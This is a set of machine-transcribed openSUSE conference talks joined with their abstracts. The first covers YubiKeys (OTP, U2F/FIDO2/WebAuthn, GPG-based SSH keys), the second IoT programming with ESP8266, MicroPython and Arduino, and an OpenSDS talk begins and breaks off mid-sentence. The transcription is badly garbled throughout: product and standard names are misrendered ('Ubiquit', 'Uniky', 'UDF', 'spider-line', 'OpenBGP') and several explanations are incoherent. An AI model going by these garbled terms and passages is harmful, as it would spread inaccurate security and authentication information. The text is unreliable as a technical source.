choose to do this short press or the long press, and you can also use this with a PEM module, which is called PEM-Mubico. You can use this for local authentication. So you can use the Ubiquit to authenticate against the system, so in order to lock into the system, you not only have to provide a password, but also some of the right new key. The drawbacks are, unfortunately, that not a lot of service providers pick up on this. There's only a limited number of them, and also this requires network connectivity, so the service provider needs a connection to Ubico in order to verify if something breaks in an authentication language, which is an important attribute of the system. There are other kinds of one-time passwords. These are probably more familiar with... They are usually referred to as O. This is an open alliance for authentication and standardizing on those one-time passwords. There are two kinds of one-time passwords. In this category, either time-based, which is DOTP or HOTP, which is event-based, so basically you can choose what you want here. Both as advantages and disadvantages. The Ubiquit, for instance, the event-based one, the HOTP, works just like before you press the button and it just spits out this key. With the time mark, we need an additional application because the Ubiquit itself does not have a clock, so you need to have some support from the operator, from the computer, from the host system, which will take time to the Ubiquit. Then we usually will just end up with six-digit code. For instance, if you are familiar with the Ubiquit authenticator or with free-of-DP or something like this, the standard is the same, so they all of them will generate the same codes. Then you can enter those codes manually or with the Ubiquit with the default. This key is also based on a shared secret, so this time there is no network connectivity required because the shared secret is on the Ubiquit and the service provider has it, so you don't need to defer a party, but it requires some initial configuration so before you can use it with any service provider, you have to set it up and share the secret action. It's easy to do fast, but not for everyone else. Also, with these one-time passwords, you can only use it as an additional factor because you have only the six-digit code, but you don't know who belongs to it. So before you can actually verify it, the user has to provide his username and ID also has password already, so you can use it as a second factor, but if someone just gives you this code, then you don't know who it is with the Ubiquit before. As I've said, there's a prefix which will tell you which user it is, actually. But here, they are not for a party anymore. You can also use it in open-users, or it's supported out of the box, but as I've said, it requires some initial configuration, so you need to configure it. So even if the service provider will tell you a secret, they will usually give you via some QR code that you scan with Ubiquit, for example, but they code it within this QR code information that you can also burn in Ubiquit. And once again, with Ubiquit Manager, you can configure all of this, and with any Ubicode, you can also use it for local authentication, so once again, you can use this to authenticate against the system. Now you don't need any internet or network connectivity, so you can use this basically without requiring your network connection. But the drawbacks are that you should set up, as I've said, it's very easy for us to do. You copy-paste a string into this application, and the application will burn it into the Ubiquit, but for other target audiences, this might not work out. And also, it scales very badly, so technically, I would need... I don't want to share the same secret with other service providers, so I would need a shared secret with every service provider. Unfortunately, Ubiquit only has two slots, so I can at the maximum use this Ubiquit, or one Ubiquit only with two service providers, so you can imagine that this doesn't work out in the internet, or you have hundreds of accounts. And on top of that, just in general, this applies to all of the one-time passwords. There's a bunch of problems, so they increase the security quite a bit, actually, where you just simply see the password doesn't work anymore, and it also has a cool touch to it, so it feels like launching rockets and you have to look up some code or something. But they also don't solve a lot of problems, because in the end, what happens in reality is that people are not only using the passwords, but they also do other stuff, so like putting the password into the wrong web page, and if they fall for this, then they will also enter the one-time password, and then it can be used by many different... Still, the hijack sessions, like browser sessions or something, if you get a hold of the cookie, and in the end, it's also based on shared secrets, so if the server is provided, it has to store it somewhere and it can use it, so all of this is not read as... The most important thing is that it skates very badly, so as I've said, you would have... you really need basically dozens of UV keys if you wanted to write, and just not consider it as a write. What's more interesting is like... or where they try to do it right, is when you do it by the time the web is open, the security is open, so there's a story to be speaking that we do it again first, and then the others under reward out of that, and those are now using public key cryptography, and now it begins to get interesting because we will have different keys for different service providers, and not the same key environment. This skates very well for users, so you can get the same key with a whole bunch of service providers, and that's not a problem at all. You can use authentication to write, so it's difficult or not as straightforward to use it for anything other than work authentication, and duration at least is to get rid of passwords all together. So sometimes also, you probably have this password less time or age, so if you do work with the 502, there are several modes where you don't need any password or you just need a key, and that's... And here the basic idea with all three of those, because I won't have time to go and delete it, is that you have an authenticator, which is the Ruby key in our case, this could be also implemented in software, and also you have supported browser, and the browser is now talking to the service provider, and on the one end, and on the other, and it's talking to the authenticator, and kind of relaying messages between the two parties. So UDF was developed and started in 2012, now it's a technical correct term as the title UDF, because it was donated to the spider-line, and out of all of this came web of N, and this is a layman's term, it's the modularization of UDF, so there's this one aspect, the server-to-line communication is happening between the browser and the server, this is web of N, and then there's this client authenticator communication protocol, this is the communication between the browser and the authenticator, and this was split up basically, and all of this together is referred to as title UDF, but here we are going to use this synonymously because we don't have time to go into the details, and it's a little bit more complicated than this, but with all three of them, you have this terminology, so usually you have this server, which is referred to as relying party, it generates and delivers some JavaScript code, this JavaScript code is then executed by the browser, and it will then basically, the JavaScript code will tell the browser, hey, get in touch with the authenticator, and the authenticator is just an accurate model, it can be implemented in many different ways, but the most straightforward way, and one of the most secure ways to do it is the UDF, it can also be done in software, where you can use main TPM modules, or sometimes it is to make it a little bit more secure, but we are focusing on the hardware tokens here, and basically there are only two kind of serial monies, so before you can use this with any service provider, you have to register in UDF, so somewhere once you are logged in, you can use the password these days, you get into the options, and somewhere you can tell them, hey, I want to register UDF, so I will follow the token, and it will ask you, and the browser will then ask you to enter your token and press the button, and there is the second serial model, which is the authentication, and here you already registered UDF, the service provider, so the service provider already has the key, and you can then sign a challenge where that is going on behind the scenes, in order to authenticate. This is basically the complex, or the technical overview of what is going on, and some of the JavaScript API, and what arguments are there are, but this is only interesting for developers, for users, the user experience is really easy, so we serve the web justice usually, justice you are used to, and at some point when the browser asks you to touch the button on the UDF key, you do so, so there is nothing, basically there is nothing for you to really do, besides sticking in the UDF key and touching the button. All of this is also working in openSUSE already, so it actually works with any modern browser, so the Firefox code and so on, the Firefox, there is this one configuration you might have to enable, I'm not sure what the default is by now, like a year ago it was not enabled by default, but as far as I remember, they wanted to enable it at some point, not sure if the code itself, and with the UDF key manager you can actually only turn off or turn on this mode, but you cannot do any more than that. Then there is the list of browsers that are supporting this, and for us, it's Chrome and Firefox, and the nice thing about this, this was basically the kind of innovative back then, is that there is an integrated key base, so the public key property, you always have key pairs, and you don't want to reuse the same key base because then your back base is the same problem, and you're using different key pairs, you are not traceable, and it's a little bit more complicated, but it's using the curved cryptography, so you can use any random fit pattern, actually, so what's going on, on a high level, is you take the device secret, you take the URL of the website, you hash this together, and this is your key, you have private key, and from this, you have the public key, which you send to the service provider, and actually the Uniky is not saving any of those keys, it can just regenerate whenever it needs to, so there's not a lot of storage on those Uniky, and cryptographically secure storage is extensive, so this is the nice aspect, it states well without requiring a lot of storage, and this is what's going on cryptographically, but once again, the only interesting thing is that it takes the URL into account, and a device-specific secret, which is specific to each device, so every device, every Unity UI, takes a different secret from the Uniky, and therefore it will generate different private keys and public keys, and you have the web browser, and the middle, and the web service, and the end, and all of them are Uniky's free transfer, and because we have this URL built into the team, so there's phishing protection within, if the website changes, if you figure around with the URL, and replace a zero with an O, or something like this, stuff that is going on, and people fall for it, it will no longer work, because the hash will become a different email forward, it looks very similar for the human app, and also this scales very well, because we don't have to save anything here, you just press the button, and in the background, the magic is happening, with different individual key pairs for each service, and because we have those different individual key pairs, we are also not traceable, so even if I use the same key, between different service providers, somebody looking at all of this, cannot tell that it's the same Uniky, and also a nice aspect is that the service provider has only public keys, which are kind of useless, you cannot derive anything from that. Yeah, and then there's another mode, so another mode, basically you're switching topics again, and I have to look in the past about this, I'm sorry, but there's this OpenBGP smart card that you can use, so OpenBGP probably most of you already know, it's mostly used for email encryption, and also for package signage, so when you download packages from SIPA, there's OpenBGP working in the high-design, and it's verifying the integrity of the packages, but for a lot of people, so you can use the Uniky for this kind of thing, so you can put your keys on the Uniky, and then use it for encryption, so in order to decrypt an email, you have to plug in the Uniky into the computer, and only then the email can be decrypted. That's already nice, but what's even nicer is that you can actually use PGB as an SSH agent, and then you can actually use the Uniky for SSH authentication, so you can put an SSH and now a SAK key on the Uniky, and this can be used for SSH authentication. And all of this is also in open-sources supported out of the box. You only need this GPG2 package, which probably is even installed by default. It requires some special setup. You need to use the email with the SSH agent with the GPG, and also you have to set some environment variables, but once this is done, you only need to do this once, and then you can just use your SSH command as you're used to with SSH, and then you can look into systems, and then you will actually use the Uniky, and you unplug the Uniky, and all of that. And the nice thing about this is that your keys are stored in hardware once again, and when you use the Uniky, so basically the smart card, the Uniky is protected with a pin, so whatever you are using it, you have to unlock it with the pin, and when you use it or something, then normally it cannot be used first, because after a real failed attempt, it will block itself and then only unlock it with a hook, and then this one three times, and then it will just reset itself and block completely, and you cannot really use it again. So there are some... It's more secure than just putting your keys on a hard drive and hoping that nobody will ever access it, because even if it's encrypted on the hard drive, you can still use it for the end of the time. And actually there are many other use cases, so these were probably the most easy ones to use, so this whole if aspect to it, but this is more or less only interesting for enterprises, and it's a little bit more complicated to roll out and manage, then there is also a challenge response mode, this can be used with password managers, for instance, because this shared secret approach is not really working well, you can use it with static passwords, so you're telling the human key to just spit out a... not a random... the static password, but it's... it can be very complicated, so you don't have to type it in manually, and you can also use it with Bluetooth and NFC for mobile platforms with Android and... and if you want to know any more details, now as I've said in the developing, there is a workshop where the idea is to set all of this up, to what I was talking about here, and also there's a lot of resources in the internet, so as you see, the developer is the newbie-tour.com site, it's a really great portal, and it could start in on-for-any, an expedition-study mode, not to take... if you're interested in more, and it's good to have a private human web of N, because I was very high-level, and I actually simplified it to a degree that's kind of wrong, but I did a talk with the mechanics at Nihonstahlia about it, and we'll go into some of the details in history. So in summary, the password by itself is kind of insecure, and utilities are very easy to use, and it increases security, so everybody should use them. It's... the support is quite good in open-suiters, so there's no reason to not use it. And now we are coming to the expected aspect of this. So I'm still here. So there's also on this unicorn, just a little bit, as I said, this is the unicorn, so it's a kind of a redolub. In the whole instance, you can validate, so they have a bunch of different demonstration sites, and they get you there, and the easiest one to use is this Unico OP, it was the first one I was talking to, and here, but there's no unique one, so I'm not sure we just enter those keys. The browser doesn't mean anything, but the service provider can actually decode this on this noise, and other information in there, and you can use this to tell it, it's the right user, if the user has the right unit here. So this is one thing that you can use here. The more interesting thing, more than one, is the Fido user, so the Unico app and Fido start on next. So as I said, with Fido, Unico app and Reccomender, these two steps basically, in the first step, we have to register a Ubiquit, so this is very important to the order of the service provider, and we have to tell them about the service team, but this is only a simple build use case, so there's not a lot of fancy other authentication going on, but essentially, there's a button, now my browser is executing JavaScript here, and this dialog is coming from the browser, and it's now asking me, telling me, hey, this website wants to use the authenticator to agree, I can press continue here, because I simplified so much, there's an option to stay anonymous, or to actually also send a local registration certificate, which will be a very service provider, what kind of unit you have, which could then in turn be used to track me, so I can either choose to do so or not, there's a method here, and now I'm asked by the browser to put my finger on the unit today, it's also building, but this one you can't see from behind, and I just press this button now, and once again, you get a lot of stuff that's going on, and you can check this here, this is all of the information that is exchanged between the browser, the unit key, and the service provider, you need to understand something about cryptography in order to make sense of it, but essentially, all of this is sufficient to authenticate, so I think this is very easy, you don't have to understand all of this technical stuff, you only press the button basically, and once I registered my unit key, I can also, there's even more information I can check out here, but the second step is actually to authenticate myself, so I've now registered this device with the service provider, the service provider knows about it, so the next time I come along, I will authenticate, and once again, this is only a demo, so I have to press the next button here, and basically it looks the device anyway, now I'm not even asked if I want to stay anonymous anymore, I've just been shown this dialog here, I press the button, and I'm successfully authenticated, and this is way easier to use than any password and stuff like this, and it's also way more secure, so this is very nice, and one more thing for you, so one more demonstration, and then I can find this one, so you probably, yeah, so basically I have a bunch of files lying around here, so I can use those SSH private keys and public keys, and usually you probably all know how to use them to authenticate against the server, you can just basically type a dash i option on the command line, or you can set up your SSH configuration to use them, what's more advanced is to use the SSH agent, so there is something like this, the SSH agent, this is also coming with the open SSH package, and if you do something like this here, and now I have an agent running, and you can communicate with this agent with this SSH dash add command, and you can now add those identities here, so what you could basically do is to take this key on the hard drive, add it to the agent, and then it can be reinstalled, and you don't have to decrypt it also, this is more convenient, but what's even more secure is to use GPG as an SSH agent, so you basically have to get rid of all of this, and you can use that as a new tag, so I have my setup, you set this variable here in a specific way, and in the end I end up talking to the GPG agent instead of the SSH agent, and here you can see the card number, this is my SSH key line around the new key, and now I can use this key just again, the other key I will install it on the server, I can use it for authentication, and when I unplug the new key, for instance, I don't see any method, it is only from, this is basically more secure than having keys that were on directory. And then it does pretty much it, and the place where I can open up for questions and answers. Yes, go ahead. What, how exactly does it make more secure to the build up passwords? The problem is in fact that I know something, it is more secure to use the new key than the password. So it is a bit difficult, but I would argue for most people it will be more secure to use the new key than the password, because people have proved over and over again that they are not able to use passwords currently. And also, the last validations for the entropy of passwords, which can be deployed. So I assume you know a lot about passwords, you are using random passwords for a lot of entropy, but still there is something, and then some of the answers you compute are basically somehow gets to know what passwords, he can use them. He can use them as often as he wants them to, so this is not true of the new key. The new key needs to be physically stored in there. I think most people know way better how to secure physical stuff than to secure some information on some random key. So that's the main argument. Passwords can be secure to some extent, but most people there are just proven by reality. I thought that you said that question. Can I add the password security for the new key? Yeah, so this was basically kind of the simplification of it. With U2F you would not. So this was basically the first step of this, but now with U2F5 and with I2 there is a pin, just like any other smartwatch, and you can lock your new key basically, and if you do it wrongly, too often, you really won't get stuck there. So that's most unresentable question. Yes? Is it possible to replace secrets on the hardware? It depends to which module you're referring to, so to this U2F web of N and 5.2.9, that's why I don't know. This is really drawn into this thing. And with the other stuff, with the one-time password, you can set that for yourself and... The service provider will tell you that. But how can you... There's not a copy at Ubico... It's the one thing you have trust Ubico. But you can just put your own... I'm not sure, so as far as I know, it's not possible. Yes? What do you do to reduce it? We have a problem, and the answer... Basically, the file 2 answer is to have multiple keys registered with service provider. So you can actually... Everywhere I register it, you have some in the menu, you can also... You can register multiple ones. But of course, it's inconvenient. I also dislike this aspect of this phone. Okay, okay. Could you put your own secret onto the device and could have a paper copy somewhere in your safe? Yeah. I don't think this was... Any other? It seems like it's very much vendor-locked in because of this dominant position of Ubico in the center. So is there any chance that this system can be federated in some sort? I wouldn't argue that this is vendor-locked because there's a lot of other vendors also. It's an open standard that everybody can implement. So that's a question. You just make sure it's from the standard. Like it's described as much as I was able to make my own Ubico company. And I was not locked in by the fact that the most service providers would need to have this third party contact with me, which they wouldn't do because they say 90% of the users are already in Ubico. So it's like I could of course not have a Gmail account, but it's quite hard to have my own SMTP for live descending stuff. So there is sort of a vendor-locked even though SMTP is an open standard in the sense that there is no inaccessible documentary on how to implement it. Still, I'm locked into certain bigger providers. What is your take on that? How it is positioned in Ubico? It also depends kind of the more when we're talking about FIDU2, then there was this question if I want to stay anonymous or not. If I choose to stay anonymous, the service provider doesn't even know what kind of device I am in. They will just be sending a public key and they don't know it's a unique key if it's done in software or if I have something else. I think Google has the title key which is basically they decide for whatever reason they don't trust Ubico or they don't want to partner with them anymore so they are building the company. If you choose to send along this, what happens in the background is you send along a certificate specific to this device and it is signed by Ubico basically. The service provider could technically say hey, I'm only allowing devices from Ubico. So far I haven't seen anyone doing this. I'm technically a good person. Question answered? Sort of. I have to give you some thought to... I can't conceive of this. Let's discuss afterwards. Any other questions? That's it from my side. Thank you.
YubiKeys are handy little USB tokens that allow for hardware-based cryptography, which are becoming ever more prevalent. They provide support for a great variety of cryptographic protocols and standards, and offer several modes of operations. While this makes them very versatile, it can also be somewhat confusing, especially when you are only getting in touch with them for the first time. This talk is an introduction to YubiKeys. It will explain what multifactor authentication is about, what kind of problems the YubiKey is addressing, and how the different modes of operation can be used to improve computer security. In this talk two new emerging authentication standards will also be touched upon, namely WebAuthn and FIDO2. These are related to the YubiKey and in combination will make authentication throughout the Internet substantially more secure. More importantly, however, it is very easy to use - even by non-technical people! A live demonstration will show you how a typical workflow looks like. Some advice and good practice, along with a Q&A session will conclude the talk. Recently some effort has been put into packaging and updating the software stack for YubiKeys within openSUSE, so that everything (including the latest generation of YubiKeys) are supported out-of-the box. For this talk no prior knowledge about the topic is required and/or expected. Any cryptographic concepts that are needed for explanation will be introduced on a high-level during the talk. Having basic cryptographic knowledge will definitely make it easier to follow along on some details, though.
10.5446/54410 (DOI)
Okay, so welcome to this talk about IoT programming with openSuser. My name is Klaus Kempf. I'm a Senior Product Owner currently working for the CASP offering, the container as a service platform. But today, let's look at what is IoT? Why is IoT important to everyone? And since you're all hackers, I'd like to show you a couple of IoT devices and especially how to program them with openSuser. What about me? I'm meanwhile an openSuser veteran 20 years already. Active and open source for quite some time. Google knows it all. Privately, I'm a father, a hacker and a maker. I love agile and, as I said, taking care of containers. But IoT. So who knows what IoT is? Who has heard about IoT? So not everyone raised his hand. So IoT is the Internet of Things. That means that everything one day would get an IP address. Maybe these chairs will get an IP address, maybe the projector already has one, and they all communicate and interact. Why is it important? Because there's a lot of money behind. Simple as that. If everywhere there's some computer or device which has a CPU and some means of transferring in information. It is also important to all of us in terms of security and to understand what this actually means. Let me start with a couple of IoT device examples. Many of you know this. That's actually not the latest version. Newer versions have wireless, but that's not what I'm going to talk about here. Because these things are pretty trivial in the sense of you can put Linux on them and treat it as a normal device. What I'm going to talk about is these things. And I have one here. So the little blue thing which almost can't see. This is an IoT device. The cables and the other thing is just a serial connector, a serial to USB. The IoT device is here. I have a couple of other examples. So for example, this one, again here, this is the actual CPU and wireless controller. And this is just a serial converter. This one is quite popular. As you can see, it has a lot of eye opens. And all these examples are dead cheap. A couple of euros. So what is inside? Usually they are called ESP8266. There's a successor that is called ESP32, which I don't have with me this time. They all do wireless, normal wireless. They have a risk processor and limited, very limited amount of RAM and flash. But they are cheap and for a specific purpose, they are wonderful. So what are typical characteristics of IoT devices which I think are important? First of all, these devices are constrained. You cannot run Linux on them. They are small in terms of memory. They are small in terms of CPU power. They have usually a handful, maybe two handful of pins to interact with the outside world. Almost all of them run on low power, so not the typical USB 5V but 3.3V. Some of them have analog input, so you can have analog to digital converter. Typical use cases for these are temperature sensors. Many of them have an I2C bus. This is just a three-wire bus for a lot of other things, sensors, displays, and so on. All of them appear to your device as a serial port. And of course, they all have networking capabilities so that they can interact with the Internet. Let's look at networking, IoT networking. This is the whole purpose of these things, that they can, via the Internet, connect to the world or can be reached from the outside. One example, and I have a couple of devices with me, is of course wireless LAN. It's simple. Everyone in the room here probably has a device which does wireless. The cost for these devices is small. Everyone has a router. We have one, I think, here which provides wireless in this room. So this is everywhere. And usage cost is also very, very low. So this is positive because here or at home, you usually have a flat rate and so on. Availability is also quite good. I mean, everyone who has a smartphone, smartphones today depend on wireless. They don't work without wireless. So everyone who has a smartphone has a wireless endpoint to connect to and there an IoT device can connect to. Range is limited, maybe 50 to 100 meter. Speed is quite good usually. But power consumption is not so good. So running such a device on a battery doesn't last long. They drain a lot of power. So you need for wireless, you need a power outlet and a power transformer. Then there is BLE, that is Bluetooth Low Energy, that is relatively new. I think it appeared a couple of years ago. Use of use is not as simple as wireless from my perspective. These IoT devices still cost more than wireless devices. Which cost is the same? If you have a Bluetooth endpoint to connect to, then it's simple. But they are not as available. So for example, in this room, there is no Bluetooth endpoint to connect to. Range is also very limited, usually less than a meter. Speed is not so very good, but power consumption is really, really low. So running these devices on a battery is easy. Then that is relatively new. This is GSM, so the mobile network to have IoT devices which connect to the mobile network is of use. So easy device cost is compared to the simple wireless devices relatively high. Usage cost is also high because you need the SIM card, you need a mobile contract and you pay per megabyte. So you can't stream on these devices without paying a lot of money. Availability is very good. I mean, mobile coverage worldwide is okay. Speed is also quite high, but power consumption, no. Again, those need a lot of power. And the last, and I think there's a talk about this in parallel, is Laura Van, the long-range wide area network. That is something pretty new. These are views is quite okay because again, it's like the Internet. Problem is device cost. Those devices are still relatively expensive and especially the endpoints are expensive. But the nice thing about Laura Van is Laura Van, especially in Europe here, is growing in the sense of that people provide free endpoints. So cost, usage cost is extremely low because you can connect to Laura Van endpoint and from there, you have free traffic. Availability is not very good, but it's getting better. I think here in Nuremberg, we currently have three or four endpoints. So I, for example, I'm active in the Nuremberg maker space, the FabLab Nuremberg, and we are currently in the process of establishing Laura Van endpoint and provide Internet through this. Range is extremely good. Several key kilometers, if there is especially line of sight. Read is very, very low. But that's the purpose. Purpose is not to transfer pictures, but the purpose here is to transport sensor readings like temperature, humidity, movement or so, and power consumption is very, very good. So I don't have one of these devices myself, but what I heard, you can run these devices for weeks on a battery because they don't have a constant connection. They just turn on their transmission when needed. Okay. And all these Internet of Things, it is about sensors. This is what these devices are for. And here is a typical example of these are the sets you can get on eBay, for example. And for example, this one here is soil moisture. So you can check if your plants have enough water. There is a Hall's sensor touch. This is ultrasound for proximity. There are light sensors and so on. And such a set costs, I think, 20 euros or so just to tinker with. So with a sensor and a simple wireless IoT, you are in the 20, 30 euros range. But you need to program these things. So what do we have there? There is a very simple programming model, and this is kind of a very rough one, but it should transport my point. So you have a, of course, you have a CPU core. On top of this, you have a boot loader so that when the device starts, that it knows what to do. And on top of this, you have the firmware, that is, so to speak, the application, the base application, and then you have your application. So this is the programming, the runtime environment, and this is your application. Usually you can't change the boot loader, but what you can do is you can change the firmware. This is possible everywhere, and then you can have different applications. So let's look at firmwares. If you buy these ESP things, then they typically are pre-programmed with the expressive AT firmware. So an AT firmware does a modem emulation. So who of you is old enough that he knows about modems and the AT command set? This is pretty old. These are the things that you connected to your landline. And I think it was Hayes, a manufacturer who standardized this command set. So if you plug these devices in, they appear as a serial device, and what you need is a terminal program which talks to your serial device and opens to the rescue. There are even two of them. It is Minicom and Picocom. This is what opens to the provides, and how it looks like is something like this. So you have every command starts with AT. And then, for example, AT plus GMR shows you the version. And then you have AT plus CW LAP does a scan of available endpoints. And if you download the presentation, you will probably see more of it. And then you will see this is an actual screenshot from the openSUSA summit in Nashville where I tried this out. But you can change the firmware. And for example, the one very popular is MicroPyton. Yes, you can put Python on these devices and you can have still room to write a Python program. And what this MicroPyton provides is, of course, no graphical user interface or something like that. But the things you need to program an IoT device. So you can do analog and digital IO. You can do computations on these. It has various buses to talk to external devices. And of course, it has TCP IP and an HTTP stack. So your IoT device can provide a web server endpoint and you can connect with your mobile phone or something like that with a browser to this device and read out your temperature or the gas sensor. So for example, at the maker space, so FabLab in Nuremberg, there's a gas sensor for carbon dioxide. And based on this, there's another calculation how many people are in the room currently, which is pretty nice. There is also another project on the internet which does something similar, which scans mobile wireless devices with such a small thing. And based on this, estimates the number of people in the room. And example for MicroPyton is this. So MicroPyton even has a help command. And then you can scan the network. And at this point, I'd actually like to demo it. So what I have here is a device like this, which is the same like this one. It just has more IOPINs to connect to. And it's a bit easier because it has, I can connect a USB cable. So let's do the real thing. So here's the Python prompt. I can enter help. I hope this is readable for all of you. And here it even says how to connect to it. So I can just now copy and paste from here. Import network. Then I create a network interface and activate it. And then I can scan. Takes a while. And here it gives you a typical Python list. Let's put it a bit more up. This is a simple program. So if you check on your mobile phones, this is the actual endpoints that are available in this room. So this is the name of the endpoint. And this is the MAC address and a couple of more parameters like signal strength and so on. I see at least two who don't believe me and check. All right. So back to the presentation. Oops. That was MicroPython. Then there are a couple of other firmwares you can put on. For example, there is Esprino, giving you JavaScript environment. And there is basic and more. So if you Google for this, this is really amazing how much possibilities you have nowadays to program and interact with these devices. Firmware update is also relatively simple. So either you have a device like this where you directly connect USB or you get one of these USB to serial converters and a couple of cables. You just now need to connect the right pins to put this device into programming mode. And then again, open it to the rescue. There is Python ESP tool and the correct firmware binary. You can flash your own firmware. But no Linux. There is a couple of tools, but no Linux and Wolf. So where is Linux and where is openSuser L? All these devices need to talk to some endpoint and there Linux is everywhere. It is that Linux that holds the Internet together that provides database that runs on gateways and so on. That gives you a workstation or a laptop to program these devices. Also you do your software development usually on Linux. Then you do cross compilation. You do debugging on Linux and you have your terminal like Minicom. About cross compilation, you cannot directly run Linux or your compiler on these devices. So what is cross compilation? Cross compilation means that it is not your usual software development workflow. Your usual workflow is you are sitting on the device and you edit your compiler link run in the environment your final program runs. You don't have a change of platform. Cross compilation means that you are developing in a different platform than the final program. So you need to compile for a different device, you need to link for a different device and at the end of the link you need to upload it and then you can run it on the final device. And here openSuser has a huge set of cross toolchain tools. So for example there is a cross DCC, that means a normal GNU C compiler but it outputs code for example for one of these devices. And in order to do this you need cross headers, cross in clut files. You need the complete bin utils chain like the assembler and the linker and of course in order to link you also need cross libraries. And all this is available on Devil GCC in the build service. Here our GCC maintainer are doing an awesome job of keeping all these cross targets alive. So you get the latest and greatest GNU compiler, the complete toolchain able to cross compile for ARM, AVR is the typical device or Arduino, you can cross compile for power CPUs or risk of a five MIPS. For example MIPS is a typical CPU in a small wireless router so again kudos to the GCC maintainers at this point. Then in order to develop there is a very nice IDE and that is called Arduino. So who has not heard about Arduino yet? Good. Thankfully everyone has. So typical Arduino device would be this one, this for example has an AVR processor and also lots of IO but no wireless and newer devices of Arduino look more like this. They have meanwhile an ARM core, here they have a newer Wi-Fi module and this little thing here, this ugly shaped or U shaped metal plate is the actual antenna for Wi-Fi. And with the Arduino IDE you can directly write your programs either in C-like language that is called processing or directly in C or C++. Arduino IDE is an integrated development environment, it's a Java and it has some Go tooling and there you have everything, you have a nice editor, then it calls Arduino builder to call GCC and the linker and it supports a myriad of hardware devices. How does it look like? So it typically looks like this. So this is the editor window, you have a check mark button here, this is the compile button and then this little error right next to it, this means upload, so you can then upload your compiled program. And here coding is normal C program. What is extremely nice about the Arduino IDE is that it's easily extensible to other devices. So just for reference in the presentation, for example in the main settings you can enter URLs of additional board managers so that it knows about new hardware, new devices, new CPUs. So every device nowadays has such an extension so every time you grab a device you can add this here and it's supported. A quick look at what this means if you download or add such a device, so for example ESP8266 so the one here is called extensa CPU and when you add this you get a lot of additional binaries and they all sound familiar. So you have the GCC compiler here, the archiver, RunLip, GDB, LD, Linker, G++, the complete GNU tool chain. What is really amazing is the set of libraries, predefined libraries in Arduino. You have libraries for sensors, you have libraries for complete application web servers, you have libraries for this displays for LED stripes. Here just to pick an example is a can, a solar can is a typical industrial bus to connect such devices. You can also update your libraries in this IDE. It's extremely well integrated and of course you have a boards manager and here is just a typical list of boards and even if your board is not supported you can adapt everything. Arduino IDE is of course packaged in openSuser, it's not part of the LEAP distribution but we have cross-toolchain AVR because AVR is the CPU where Arduino started with on built openSuser.org. The package for historical reasons is sped with an uppercase R but the command is with a lower case. I adapted it in a way that if you download Arduino from the internet you get the complete GNU tool chain based on GCC6 or 7. I adapted it in a way that first of course this IDE is compiled from source so it's not a repackaged binary and I stripped all the Arduino provided GNU tool chain and this uses the cross-toolchain from GCC. I'm already at the end of the talk. So let's look at IoT programming with openSuser. It is extremely simple and extremely cheap for everyone to start with it. You have many, many sensors and IoT is all about sensors. You can choose the programming language that you are most familiar with and openSuser everything is packaged and ready to use. And with that I'm at the end. Thank you. Questions please. And we have a microphone. I will leave those ESP32 chips. They have extensa CPUs and we currently don't have extensa cross-compilers. So I have to use the binary blobs that are provided for the Arduino IDE. That's probably just approaching the GCC maintainers and enabling this in GCC. I was just pulling for the status. How far are we into this? I haven't looked at this. Okay. Thank you. Because I mean these devices I don't directly code in GCC. I usually use micro-pytons or JavaScript. Okay. I see. Of course if you want to, for example, compile micro-pytons from source then you would need it. More questions? No. Okay. From the front. From the micro-pytons, how do you upload the application? If you write a script or so? Yeah. You need to write a script and then wire a serial device. You can also enter it manually and then store it on the device. I mean they all have flash memory. So you can basically use this reduced plain Python and program it like on a normal Linux system. Yeah. Can some of the devices be updated over the air? Actually all of these devices can be updated over the air if you program it. So for example a German tool shop called OB provided a wireless power plug which you can, where you can wireless can turn power on and off. It costs 10 euros. It has an ESP8266. You can reflash it with open source application. This open source application then gives you a simple web endpoint so you can connect to it with your browser. You can add sensors to it and it has the capability to download newer versions from the internet. Nice. Okay. No more questions. So if somebody wants to have a look I have some stuff here in front so that you can see how small these things are. Otherwise thanks a lot and enjoy your day.
Small networked devices, commonly named Internet of Things (IoT), lead the next revolution in information technology. This talk will present the software and tools available on openSUSE to participate in this revolution. We will especially look at the 'Arduino' IDE to program Arduino, ESP8266, Wemos, ESP32, and similar devices.
10.5446/54411 (DOI)
Okay, now I'll start. Okay, this time I will speak this content. Richard and Takeyama, thank you for mentioning my talk. Sorry. Hello, nice to meet you. I am Shuta Hashimoto. I am a member of OpenSuze Japan user group. My work in the group is managing events, introducing OpenSuze at conference. I introduce portraits and cubic. And most important, my work is two light geek magazine articles. I usually use this icon, Twitter and Facebook and OSEM. Regards. Okay, part is OpenSZS. OpenSZS is abstraction layer of storage. Two designs used by many systems and use many storages. Their goal is open autonomous data platform. Inside, using OpenSZS, there are container systems like Kubernetes, Docker, virtualization systems like OpenStack, VMware, and other like CloudFundly. This is upper side in slide. Inside, used by OpenSZS, there are two categories. First is storage. This includes LVM, self, sender, and more. This is on the left side in slide. Second is multi-cloud. This includes Amazon S3, Azure Storage, and more. Upper side systems use transparent storage and multi-cloud storages. Oh, by the way, what is software defined storage? Usually, when we use storage by the system, system administrator set up all things. Sometimes system administrator same as system operator or developer. He should have many skills and many jobs. He creates volume and attach it to system and adjust total storages. SDS do it automatically. System operator order volume. So, system request that to SDS system and SDS system do it, creates volume and attach it. This case only includes create and attach, but SDS can do detach, delete, replication, backup, and more. In this workflow, there is one important point. That is how request. If administrator set up volumes, he can adjust set up each steps. About SDS, system should request definition and SDS system should publish API for that definition. This model is like infrastructure as code. It is storage as code if I say. Of course, code is written by not only administrator, but also system itself. Okay, I return talk to open SDS. It became to this outline when I map SDS model to open SDS. Open SDS has not bound plugin project. This provides how system join open SDS. SDS provides CSI and service catalog for Kubernetes. Sins are compatible API for OpenStack. This is outside of SDS. Open SDS has command line interface and dashboard. Dashboard is web interface. You can log in and manage OpenSDS from dashboard. How about lower side? OpenSDS only defines and implements API. OpenSDS has many drivers that join API to physical things. For example, LVM driver creates logical volume from volume group. This case, administrator only set up volume group. DRBD driver creates host best replication between two hosts. If you want to append new strategy solution, only you should write driver, but maybe that is a slightly hard work. OpenSDS have only server program. To use it, only learn it. OpenSDS have driver control program named doc. Doc manage storage drivers and controller manage doc. One case, cubic use, save through CSI. Another case, openSDS use AWS S3 object. Unfortunately, there is no northbound plugin for OpenSDS, but OpenSDS has command line interface, dashboard, and client program. We can write share script or client program. Honest story I say, many storage has manager or is manager. For example, DRBD has linker, and OpenStack can manage volumes itself. And before session talks, look is also. About this point, OpenSDS has no advantage. Lister can manage DRBD more effectively than OpenSDS. The one of OpenSDS advantage is to manage multiple strategies and use by multiple systems. OpenSDS has design outline on their GitHub. Please see that to know details. Let's see 